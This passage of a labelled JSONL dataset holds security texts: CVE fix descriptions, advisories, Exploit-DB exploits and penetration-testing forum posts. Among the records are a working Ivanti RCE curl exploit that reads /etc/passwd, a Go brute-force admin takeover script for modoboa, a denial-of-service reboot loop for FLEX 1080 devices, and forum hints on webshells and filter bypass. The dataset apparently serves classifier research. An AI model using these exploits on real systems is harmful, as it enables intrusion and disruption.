arch/x86/entry/common.c:82\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nUninit was stored to memory at:\n tipc_getname+0x575/0x5e0 net/tipc/socket.c:757 net/tipc/socket.c:757\n __sys_getpeername+0x3b3/0x6b0 net/socket.c:1984 net/socket.c:1984\n __do_sys_getpeername net/socket.c:1997 [inline]\n __se_sys_getpeername net/socket.c:1994 [inline]\n __do_sys_getpeername net/socket.c:1997 [inline] net/socket.c:1994\n __se_sys_getpeername net/socket.c:1994 [inline] net/socket.c:1994\n __x64_sys_getpeername+0xda/0x120 net/socket.c:1994 net/socket.c:1994\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_x64 arch/x86/entry/common.c:51 [inline] arch/x86/entry/common.c:82\n do_syscall_64+0x54/0xd0 arch/x86/entry/common.c:82 arch/x86/entry/common.c:82\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nUninit was stored to memory at:\n msg_set_word net/tipc/msg.h:212 [inline]\n msg_set_destport net/tipc/msg.h:619 [inline]\n msg_set_word net/tipc/msg.h:212 [inline] net/tipc/socket.c:1486\n msg_set_destport net/tipc/msg.h:619 [inline] net/tipc/socket.c:1486\n __tipc_sendmsg+0x44fa/0x5890 net/tipc/socket.c:1486 net/tipc/socket.c:1486\n tipc_sendmsg+0xeb/0x140 net/tipc/socket.c:1402 net/tipc/socket.c:1402\n sock_sendmsg_nosec net/socket.c:704 [inline]\n sock_sendmsg net/socket.c:724 [inline]\n sock_sendmsg_nosec net/socket.c:704 [inline] net/socket.c:2409\n sock_sendmsg net/socket.c:724 [inline] net/socket.c:2409\n ____sys_sendmsg+0xe11/0x12c0 net/socket.c:2409 net/socket.c:2409\n ___sys_sendmsg net/socket.c:2463 [inline]\n ___sys_sendmsg net/socket.c:2463 [inline] net/socket.c:2492\n __sys_sendmsg+0x704/0x840 net/socket.c:2492 net/socket.c:2492\n __do_sys_sendmsg net/socket.c:2501 [inline]\n __se_sys_sendmsg net/socket.c:2499 [inline]\n __do_sys_sendmsg net/socket.c:2501 [inline] net/socket.c:2499\n __se_sys_sendmsg net/socket.c:2499 [inline] net/socket.c:2499\n __x64_sys_sendmsg+0xe2/0x120 net/socket.c:2499 net/socket.c:2499\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_x64 arch/x86/entry/common.c:51 [inline] arch/x86/entry/common.c:82\n do_syscall_64+0x54/0xd0 arch/x86/entry/common.c:82 arch/x86/entry/common.c:82\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nLocal variable skaddr created at:\n __t", "source": "cvefixes", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bc48f75d16d0fe4515f6", "text": "##__SCREENSHOOTING__\n\nplease what is the solution concerning this error , but i actually run sudo apt full-upgrade --fix-mixing and then it upgrade smoothly without encountering any more error ,so why asking this? im too concern about the \" image 946×289 100 KB please i am trying to set up the flameshot so i can able to start highlighting any of my screenshot ,of course i need it !! please any help", "source": "parrotsec", "timestamp": "2022-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "afcb73b991e8a2218f95", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-06-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e7ab06c0608af49b64de", "text": "CVE: CVE-2022-23559\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause an integer overflow in embedding lookup operations. Both `embedding_size` and `lookup_size` are products of values provided by the user. Hence, a malicious user could trigger overflows in the multiplication. In certain scenarios, this can then result in heap OOB read/write. Users are advised to upgrade to a patched version.'}]\n\nFix commit: [lite] Move MultiplyAndCheckOverflow to util to be able to share it.\n\nPiperOrigin-RevId: 416897229\nChange-Id: I5feb44881bdcbb6ed911da4f17c55bb978754059", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b5f431c0200cafce3c30", "text": "Theres plenty of sources. Try doing something consenual. Attack your phone. Try and see if you can break into its Bluetooth, try to gain root access, and so forth. Metasploit is an interesting tool, so try looking for Metasploit pdf. Pick a program in parrotsec and type pdf after it. Id reccomend understand the pc. Try looking into Wireshark and understanding what your network connections actually doing.", "source": "parrotsec", "timestamp": "2022-07-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5f5b525c46862f44ba83", "text": "CVE: CVE-2022-2065\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository neorazorx/facturascripts prior to 2022.06.'}]\n\nFix commit: Force to download SVG files to prevent security problems.\n------\nForzamos a descargar los archivos SVG para evitar problemas de seguridad.", "source": "cvefixes", "timestamp": "2022-06-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2261806ef6fd0d20b91b", "text": "I realise this is quite an old post, however, just a list of some helpful resources to get started in hacking or pen testing. Some of the tutorials may mention Kali linux, but 99% of the same tools are on Parrot, and the use of them is the same. (I posted this list on the Kali forums around 4 months ago, and so far its gotten over 5,000 views, so it can’t be bad) The following list is by no means exhaustive, but is a good place to start your hacking journey. The best way to get started is to create several virtual machines on your own system, with several operating systems on there, and then you can install deliberatly vulnerable web apps and services on them, and hack them with your tools and learn how it all works. Remember, an Ethical hacker is someone who helps secure the web from malicious activity, not someone who exploits it. Not to mention that if you start hacking on web servers and networks without permission, in most countries this can land you in lots of trouble and long jail terms! Learn your way around Unix based systems, and that includes BSD, Linux and Mac OSX they all share a lot underneath; https://www.cyberciti.biz/ Learning Perl regular expressions will help you in your hacking journey; regex101 regex101: build, test, and debug regex Regular expression tester with syntax highlighting, explanation, cheat sheet for PHP/PCRE, Python, GO, JavaScript, Java, C#/.NET. Get to know the MITRE framework and how vulnerabilities are being exploited; https://attack.mitre.org/ Some of this site can be a couple of years old, but in general, the way of doing things hasn’t really changed, so it’s a good beginner starting point to get to know some tools; WonderHowTo Null Byte — The aspiring white-hat hacker/security awareness playground «... Null Byte is a white hat hacker world for anyone interested in hacking, science, networking, social engineering, security, pen-testing, getting root, zero days, etc. OSCP also have a great metsploit resource; https://www.offensive-security.com/m…oit-unleashed/ We have Portswigger who gave us the excellant Burpsuite tool; portswigger.net Web Security Academy: Free Online Training from PortSwigger The Web Security Academy is a free online training center for web application security, brought to you by PortSwigger. Create an account to get started. Don’t forget that hacking is about more than just computers; Shodan Shodan Search engine of Internet-connected devices. Create a free account to get started. If you want to learn programming, or scripting, or even get some free cyber security lessons, check out free code camp; freeCodeCamp.org Cybersecurity - freeCodeCamp.org Browse thousands of programming tutorials written by experts. Learn Web Development, Data Science, DevOps, Security, and get developer career advice. Perhaps you like to study malware, and want to get into reverse engineering; https://www.hackers-arise.com/post/r…h-ghidra-part1 For practicing what we have learned we have great sites like… Hack The Box; https://app.hackthebox.com and Try Hack Me; TryHackMe TryHackMe | Cyber Security Training TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser! A few years old now, this tutorial series from Packt publishing does focus on kali, but most of the same tools are in Parrot and its based on Debian the same, and the set up of virtual machines and everything else is the same 99% of the time. It is also a good way to get an idea of the steps you would take, and in what order, and it goes over some of the main tools; More good sites with helpful content I’ve come across recently; https://fuzzysecurity.com/tutorials.html Invicti – 3 Oct 22 Welcome to Invicti Learn | Invicti Welcome to Invicti Learn, your one-stop-shop for all information on web application security. We want to help you understand the nature of web vulnerabilities, as well as teach you to detect, avoid, and mitigate them. Est. reading time: 1 minute https://securitytrails.com/blog/vulnerable-websites-for-penetration-testing Andrea Fortuna – 22 Ju", "source": "parrotsec", "timestamp": "2023-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8edc3adb7e2c56993496", "text": "CVE: CVE-2022-31110\n\n[{'lang': 'en', 'value': 'RSSHub is an open source, extensible RSS feed generator. In commits prior to 5c4177441417 passing some special values to the `filter` and `filterout` parameters can cause an abnormally high CPU. This results in an impact on the performance of the servers and RSSHub services which may lead to a denial of service. This issue has been fixed in commit 5c4177441417 and all users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: fix: use re2, thank @Rongronggg9", "source": "cvefixes", "timestamp": "2022-06-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ef30748276136ad151e0", "text": "CVE: CVE-2022-31090\n\n[{'lang': 'en', 'value': 'Guzzle, an extensible PHP HTTP client. `Authorization` headers on requests are sensitive information. In affected versions when using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin (change in host, scheme or port), if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` option before continuing, stopping curl from appending the `Authorization` header to the new request. Affected Guzzle 7 users should upgrade to Guzzle 7.4.5 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.8 or 7.4.5. Note that a partial fix was implemented in Guzzle 7.4.2, where a change in host would trigger removal of the curl-added Authorization header, however this earlier fix did not cover change in scheme or change in port. If you do not require or expect redirects to be followed, one should simply disable redirects all together. Alternatively, one can specify to use the Guzzle steam handler backend, rather than curl.'}]\n\nFix commit: Release 7.4.5 (#3043)", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2efae30399b8fccf24d1", "text": "CVE: CVE-2022-0274\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in NuGet OrchardCore.Application.Cms.Targets prior to 1.2.2.'}]\n\nFix commit: Fix localization and sanitization usages (#11034)", "source": "cvefixes", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6fb1476ddf4eb9f66b06", "text": "For the question: Create a “For” loop that encodes the variable “var” 28 times in “base64”. the number of characters in the 28th hash is the value that must be assigned to the “salt” variable. The thing that I overlooked which is important for your script is the point “The NUMBER OF CHARACTERS” in the 28th hash. Your openssl output should look something like the following, with the “HTB” followed by 8 digits being the flag. *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. HTB******** Pseudocode for my for loop (the only part I really needed to change.) for i in range 1 up tp 28 do get the base64 value for var and assign it to a new version of var if i is equal to 28 then get the character count from the current value of var and assign that to salt fi done Good luck", "source": "hackthebox", "timestamp": "2023-03-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e6cabfa994cb2e1d07eb", "text": "Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)\n\n# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)\n# Date: 20/03/2022\n# Exploit Author: d7x\n# Vendor Homepage: https://www.ivanti.com/\n# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6\n# Version: CSA 4.6 4.5 - EOF Aug 2021\n# Tested on: Linux x86_64\n# CVE : CVE-2021-44529\n\n###\nThis is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):\nhttps://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US\n\nShoutouts to phyr3wall for providing a hint to where the obfuscated code relies\n\n@d7x_real\nhttps://d7x.promiselabs.net\nhttps://www.promiselabs.net\n###\n\n# cat /etc/passwd\ncurl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d \"\\n\" | grep -zPo '\\K.*?(?=)'; echo\n\n# sleep for 10 seconds\ncurl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d \"\\n\" | grep -zPo '\\K.*?(?=)'; echo", "source": "exploitdb", "timestamp": "2022-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ea433204c6f33d82b5fe", "text": "Trying to get to flag4. I uploaded a WAR webshell to Tomcat via manager panel. It will appear in Application endpoints list, but will not execute. It just gives me a 404 error, even though I’ve completely removed all the authorization logic from the backdoor (IP address check). I tried all path variations like: /cmd, /cmd/cmd.jsp?cmd=, but no luck. I used a webshell from Laudanum directory. Am I doing something wrong? Any other ways to get to tomcat’s user shell ?", "source": "hackthebox", "timestamp": "2023-11-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8495d064627da712ec7e", "text": "You need to systematically DIG or transfer EVERY subdomain you find, and pay attention to which DNS server you’re querying when you do it.", "source": "hackthebox", "timestamp": "2022-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e74a2630761c69b4cfd8", "text": "CVE: CVE-2021-23567\n\n[{'lang': 'en', 'value': \"The package colors after 1.4.0 are vulnerable to Denial of Service (DoS) that was introduced through an infinite loop in the americanFlag module. Unfortunately this appears to have been a purposeful attempt by a maintainer of colors to make the package unusable, other maintainers' controls over this package appear to have been revoked in an attempt to prevent them from fixing the issue. Vulnerable Code js for (let i = 666; i < Infinity; i++;) { Alternative Remediation Suggested * Pin dependancy to 1.4.0\"}]\n\nFix commit: Adds new American flag module", "source": "cvefixes", "timestamp": "2022-01-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d5e14169f73d1c18cc8c", "text": "CVE: CVE-2022-0622\n\n[{'lang': 'en', 'value': 'Generation of Error Message Containing Sensitive Information in Packagist snipe/snipe-it prior to 5.3.11.'}]\n\nFix commit: Added usleep :(\n\nSigned-off-by: snipe ", "source": "cvefixes", "timestamp": "2022-02-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3065aba4712a852cc120", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "19571724faca8e7c7253", "text": "modoboa 2.0.4 - Admin TakeOver\n\n/* # Exploit Title: modoboa 2.0.4 - Admin TakeOver\n# Description: Authentication Bypass by Primary Weakness\n# Date: 02/10/2023\n# Software Link: https://github.com/modoboa/modoboa\n# Version: modoboa/modoboa prior to 2.0.4\n# Tested on: Arch Linux\n# Exploit Author: 7h3h4ckv157\n# CVE: CVE-2023-0777\n\n\n*/\n\npackage main\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"os\"\n\t\"strings\"\n\t\"time\"\n)\n\nfunc main() {\n\tfmt.Println(\"\\n\\t*** ADMIN TAKEOVER ***\\n\")\n\thost := getInput(\"Enter the target host: \")\n\tusername := getInput(\"Enter the Admin's Name: \")\n\tpasswordFile := getInput(\"Provide the path for Password-Wordlist: \")\n\n\n\tpasswords, err := readLines(passwordFile)\n\tif err != nil {\n\t\tfmt.Println(\"Error reading password file:\", err)\n\t\tos.Exit(1)\n\t}\n\n\tfor _, password := range passwords {\n\t\tdata := fmt.Sprintf(\"-----------------------------25524418606542250161357131552\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\n%s\\r\\n-----------------------------25524418606542250161357131552\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n%s\\r\\n-----------------------------25524418606542250161357131552--\\r\\n\\r\\n\", username, password)\n\n\t\theaders := map[string]string{\n\t\t\t\"Host\": host,\n\t\t\t\"User-Agent\": \"Anonymous\",\n\t\t\t\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n\t\t\t\"Accept-Language\": \"en-US,en;q=0.5\",\n\t\t\t\"Accept-Encoding\": \"gzip, deflate\",\n\t\t\t\"Content-Type\": \"multipart/form-data; boundary=---------------------------25524418606542250161357131552\",\n\t\t}\n\n\t\tresp, err := postRequest(fmt.Sprintf(\"https://%s/api/v2/token/\", host), headers, data)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"Error sending request:\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\tif resp.StatusCode == 200 {\n\t\t\tfmt.Printf(\"\\n\\tValid password Found: %s\\n\", password)\n\t\t\tbreak\n\t\t} else {\n\t\t\tfmt.Printf(\"Invalid password: %s\\n\", password)\n\t\t}\n\n\t\t// Delay the next request to limit the requests per second\n\t\tdelay := time.Duration(1000000000/50) * time.Nanosecond\n\t\ttime.Sleep(delay)\n\t}\n}\n\n// Read the lines from a file and return them as a slice of strings\nfunc readLines(filename string) ([]string, error) {\n\tcontent, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn strings.Split(string(content), \"\\n\"), nil\n}\n\n// Send a POST request with the given headers and data\nfunc postRequest(url string, headers map[string]string, data string) (*http.Response, error) {\n\treq, err := http.NewRequest(\"POST\", url, strings.NewReader(data))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor key, value := range headers {\n\t\treq.Header.Set(key, value)\n\t}\n\tclient := &http.Client{}\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn resp, nil\n}\n\n// Get user input and return the trimmed value\nfunc getInput(prompt string) string {\n\tfmt.Print(prompt)\n\tvar input string\n\tfmt.Scanln(&input)\n\treturn strings.TrimSpace(input)\n}", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "df5d1a547278703d5a81", "text": "The USB use in question are used to turn an physical part inside of the ignition cylinder. The reason why they are able to drive away with the car too (for all KIA Hyundai models in the usa for an good range of years) is because there is no chip key immobilizer for any of those cars affected by this. (For people that don’t know this, the chip keys are like like using https to surf the web with encryption or verification as an basic example. In actual use, a chip key broadcasts an RFID frequency and the immobilizer has to have the correct key code reading to start the engine and disable security. (The code gets verified by the BCM, TCM, and ECM etc.) I believe (as an logical guess) the update that KIA pushed out recently made the BCM (body control module) check for continuity (for open circuits) on some wires near the ignition cylinder since there is some “fabrication” when performing this “brute force” attack. This is a way they can correct the cars for not having an immobilizer, and prevent starting of the vehicle. (fun fact in Canada the immobilizers are required by law including daytime running-lights but not in the USA.) Hopefully this stops the crimes from occurring. But unless something changed recently there is no app or hacking involved while stealing the cars, just poorly designed parts and cheapness from KIA unfortunately. (to Justin: if the car did not get the update I would recommend going to an aftermarket autoshop to install an aftermarket kill switch hidden to give better security for that vehicle, or potentially get an car that has an immobilizer)", "source": "parrotsec", "timestamp": "2023-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1d9f3e7a1128c5cf2c70", "text": "After maybe about a week I was finally able to get this assessment figured out the best hint I can give it to follow what you did with Bill in the previous sections, but you do get a login for g.potter.", "source": "hackthebox", "timestamp": "2022-03-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "06fbe3814153cb249b38", "text": "FLEX 1080 < 1085 Web 1.6.0 - Denial of Service\n\n# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service\n# Date: 2023-05-06\n# Exploit Author: Mr Empy\n# Vendor Homepage: https://www.tem.ind.br/\n# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94\n# Version: 1.6.0\n# Tested on: Android\n# CVE ID: CVE-2022-2591\n#!/usr/bin/env python3\nimport requests\nimport re\nimport argparse\nfrom colorama import Fore\nimport time\n\ndef main():\n def banner():\n print('''\n ________ _______ __\n / ____/ / / ____/ |/ /\n / /_ / / / __/ | /\n / __/ / /___/ /___ / |\n /_/ /_____/_____//_/|_|\n\n[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]\n\n''')\n def reboot():\n r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')\n if 'Rebooting' in r.text:\n pass\n else:\n print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware\nnão é vulnerável')\n quit()\n\n banner()\n print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')\n while True:\n try:\n reboot()\n print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware\nderrubado com sucesso!')\n time.sleep(1)\n except:\n# print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware\nestá inativo')\n pass\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-t','--target', action='store', help='Target',\ndest='target', required=True)\n arguments = parser.parse_args()\n try:\n main()\n except KeyError:\n quit()", "source": "exploitdb", "timestamp": "2023-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "34d6eee2a6320b962492", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based)L, aka Chakra Scripting Engine Memory Corruption Vulnerability. This CVE ID is unique from CVE-2020-0812.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d447aa24560aadba7d15", "text": "The files having the .bak are few and thus running the command below should get you through. find / -type f -name *.bak -exec ls -al {} \\; 2>/dev/null TazWake: I would use / because they ask for the whole system and I’d use -iname to make it a case insensitive search (assuming they meant .LOG or .log to count - this could be incorrect). I’d put the *.log in quotes to stop the shell expanding the wildcard before find does.", "source": "hackthebox", "timestamp": "2023-06-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c227dd17df6b2aed809d", "text": "Hi Bill, Warloxian: web sites telling me my IP has been blocked because of suspicious activity Do you have anonsurf running while this error? Or you are using the tor browser I guess! Websites like youtube, quora often show this message when I use onion-routing things. Overall I am also new to Pentesting, so I did not understand many of your statements like (ring doorbell, Node giving MITM Warning, etc) Apologies for that.", "source": "parrotsec", "timestamp": "2022-04-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4605782aa3c1c3246622", "text": "I created this payload and still mot able to move the flag.txt to tmp folder Can you help me on this", "source": "hackthebox", "timestamp": "2023-12-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "89427dc10a51453d8af6", "text": "I’ve had hackers get into my backdoor more than once and it caused all sort of problems.", "source": "parrotsec", "timestamp": "2022-02-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "78b4508dda14d8ba5a67", "text": "using apt list --installed | wc --lines will always give you incorrect answer cause it add a line before printing actual installed packages. using dpkg -l | grep '^ii' will show you the exact count", "source": "hackthebox", "timestamp": "2023-09-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a89ac02fbead6c30fe84", "text": "CVE: CVE-2022-23574\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. There is a typo in TensorFlow's `SpecializeType` which results in heap OOB read/write. Due to a typo, `arg` is initialized to the `i`th mutable argument in a loop where the loop index is `j`. Hence it is possible to assign to `arg` from outside the vector of arguments. Since this is a mutable proto value, it allows both read and write to outside of bounds data. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, and TensorFlow 2.6.3, as these are also affected and still in supported range.\"}]\n\nFix commit: Fix heap OOB read/write due to incorrect indexing.\n\nPiperOrigin-RevId: 408578046\nChange-Id: Ifc9ffea49e5890f55fcb2c27568611052c3ddcfa", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "231a0a516b82de95385c", "text": "Try to use dnsenum with any subdomain that you found on your first subdomain enumeration.", "source": "hackthebox", "timestamp": "2022-04-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b66f4bda01fd0f9f58dc", "text": "When u complete the first skills, the website brute forcing u get a welcome page saying welcome harry potter and what his password requirements are. The seconds skills assessment follows on from that.", "source": "hackthebox", "timestamp": "2022-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "42cf3104a0361c501f01", "text": "Hello, I’m stuck in Packet Inception, Dissecting Network Traffic With Wireshark. I have to connect to a target machine with Nomachine to launch Wireshark, but I can’t find the target IP. It is not shown in the connection instructions and all the IP I’ve tried in the Wireshark-Lab-2-Resources are not reachable from the Pwnbox. If someone could provide me some help it would be great. Regards,", "source": "hackthebox", "timestamp": "2022-04-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2d518dfdafd02b888c64", "text": "CVE: CVE-2021-37524\n\n[{'lang': 'en', 'value': 'Cross Site Scripting (XSS) vulnerability in FusionPBX 4.5.26 allows remote unauthenticated users to inject arbitrary web script or HTML via an unsanitized \"path\" parameter in resources/login.php.'}]\n\nFix commit: Fix XSS on login page by removing $_REQUEST[path]", "source": "cvefixes", "timestamp": "2022-07-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e607b04c2141b0e51db5", "text": "CVE: CVE-2022-0832\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.3.3.'}]\n\nFix commit: escaping fields in SERP preview", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "56c51e36a0bcfa9ddc9f", "text": "CVE: CVE-2022-24719\n\n[{'lang': 'en', 'value': 'Fluture-Node is a FP-style HTTP and streaming utils for Node based on Fluture. Using `followRedirects` or `followRedirectsWith` with any of the redirection strategies built into fluture-node 4.0.0 or 4.0.1, paired with a request that includes confidential headers such as Authorization or Cookie, exposes you to a vulnerability where, if the destination server were to redirect the request to a server on a third-party domain, or the same domain over unencrypted HTTP, the headers would be included in the follow-up request and be exposed to the third party, or potential http traffic sniffing. The redirection strategies made available in version 4.0.2 automatically redact confidential headers when a redirect is followed across to another origin. A workaround has been identified by using a custom redirection strategy via the `followRedirectsWith` function. The custom strategy can be based on the new strategies available in fluture-node@4.0.2.'}]\n\nFix commit: Update redirection strategies to drop confidential headers", "source": "cvefixes", "timestamp": "2022-03-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ac2a50733c3818745772", "text": "CVE: CVE-2022-1806\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository rtxteam/rtx prior to checkpoint_2022-05-18.'}]\n\nFix commit: remove some cruft and implement a sanitizer for the client-supplied callback function name", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ad42a568ec87d1ea9110", "text": "Thanks bro. No I didn’t still Firefox at some stages does not load fully websites, it’s just load and nothing more. I purged it then reinstalled/turned off all plugins , still same problem. I use alternative browser from two days. I remember when my fan was noisy, I turned off or killed some process and it was quite , but it is stopped working after reboot, so am pretty sure I disabled some Firefox process but don’t remember which one … EDIT: now even firefox settings does want to run, I click and nothing opens…", "source": "parrotsec", "timestamp": "2022-02-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9230786e7beddee067d6", "text": "Hello friend! Taking notes for OSCP and HTB can be a game-changer, right? You should definitely check out https://notesonline.com – they’ve got some awesome tips and templates for effective note-taking. Personally, I’ve found that breaking down challenges step by step and using screenshots helps a ton.", "source": "hackthebox", "timestamp": "2023-08-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fc8fd1e8842821b3c3fc", "text": "CVE: CVE-2022-0238\n\n[{'lang': 'en', 'value': 'phoronix-test-suite is vulnerable to Cross-Site Request Forgery (CSRF)'}]\n\nFix commit: phoromatic: Additional input sanitization / validation", "source": "cvefixes", "timestamp": "2022-01-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "45f9f24276772be1553f", "text": "CVE: CVE-2022-23586\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that assertions in `function.cc` would be falsified and crash the Python interpreter. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Eliminate `CHECK`-fail from `function.cc`.\n\nPiperOrigin-RevId: 409414744\nChange-Id: Ic854e12ab2edb88b165d32e2d632c4ee654d71ad", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d45d6ddd702401971be6", "text": "CVE: CVE-2022-23126\n\n[{'lang': 'en', 'value': 'TeslaMate before 1.25.1 (when using the default Docker configuration) allows attackers to open doors of Tesla vehicles, start Keyless Driving, and interfere with vehicle operation en route. This occurs because an attacker can leverage Grafana login access to obtain a token for Tesla API calls.'}]\n\nFix commit: Disable anonymous login to Grafana", "source": "cvefixes", "timestamp": "2022-01-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cf3dd9976ba8730060d1", "text": "Solution for the issue Dear Academy members, For anybody still having the NT_STATUS_IO_TIMEOUT issue in the Windows Fundamentals Module, the reason causing your inability to ping/interact with the machine (besides port 3389 ) is the Windows Defender Firewall . In order to fix the issue, you must open the Windows Defender Firewall settings in the target machine. image 675×668 91.1 KB Head into the Turn Windows Defender Firewall on or off section, and turn off the options. Best of luck with your studies! lypd0", "source": "hackthebox", "timestamp": "2023-09-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3b5aba22e0f63934a42b", "text": "I think this box might spawn with slightly different parameters for each person Because || and | always came back as malicious for me, and in Naivenom ’s screenshot, it looks like the command is being executed with sh whereas for me it was using bash. Also I never got anywhere with <<<. I did end up using ${LS_COLORS} and ${PATH}. I think it might be based on IP, as the rules always seemed to stay the same even when I reset the box. Could probably test this with a VPN but I don’t feel like it. If you’ve scrolled down this far you’re probably pretty stuck, here’s what I have to add: johneverist ’s tips are very good. Use them. Number one thing, don’t get stuck 